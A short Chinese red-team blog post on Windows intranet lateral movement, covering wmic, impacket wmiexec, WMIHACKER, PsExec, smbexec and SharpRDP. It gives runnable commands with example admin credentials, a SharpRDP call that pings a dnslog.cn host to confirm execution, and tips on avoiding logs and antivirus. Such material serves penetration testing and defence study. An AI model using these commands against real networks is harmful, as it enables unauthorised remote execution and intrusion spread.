内网常见横向姿势(1)

admin 2022年12月2日11:57:47评论100 views字数 956阅读3分11秒阅读模式

内网横向windows姿势---(上)

太久没更新文章了,今天就分享一下内网的姿势。

内网常见横向姿势(1)

                                        

  • wmi 

WMI,WMIHACKER

Wmi内网执行命令

wmic /node:192.168.234.152 /user:administrator /password:admin@123 process call create "cmd.exe /c ipconfig >c:ip.txt"
  • wmiexec

imacket套件中自带,常用于内网渗透中

Python wmiexec.py administrator:[email protected]

即可,相较于psexec来说,无其他文件生成,无日志产生。

内网常见横向姿势(1)

若需要上传文件可以使用 lput在wmiexec中操作上传文件。


  • Wmihacker 

相较于wmiexec ,单走135端口即可,不需要链接其他port,在仅开135端口时,可以用此执行,取回命令。

内网常见横向姿势(1)

1是取回执行命令结果的意思 0是不取回.

内网常见横向姿势(1)


  • PSEXEC

Psexec 是一个较为古老的横向操作,同样impacket 套件自带与 wmiexec不同的是,使用的时候会落地一个exe,该行为十分敏感,容易被杀软查杀,所以一般内网横向我们一般使用wmiexec等横向

使用 impacket 组件自带,与wmiexec的使用方法类似。

内网常见横向姿势(1)

但个人建议使用 微软自带的psexec,相较于impacket组件带的psexec 微软自带的免杀性更好。

psexec.exe  -accepteula \192.168.234.152  -u administrator -p admin@123 "cmd.exe"

内网常见横向姿势(1)

  • Smbexec

Smbexec 单走 445 ,针对在有杀软的情况下好用。

使用方法与wmi,psexec一致 但lput命令无法在此使用,一样可以使用exit 退出

内网常见横向姿势(1)



SharpRDP 

基于3389的横向操作

SharpRDP.exe computername=192.168.234.152  username=mo password=Admin1230.0 command="ping -n 2 j0tqu4.dnslog.cn”

所用户不在线的情况会创建一个新session

内网常见横向姿势(1)

注意若是用户在线,将会锁屏.

内网常见横向姿势(1)



原文始发于微信公众号(红队笔记录):内网常见横向姿势(1)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月2日11:57:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网常见横向姿势(1)https://cn-sec.com/archives/1439899.html

发表评论

匿名网友 填写信息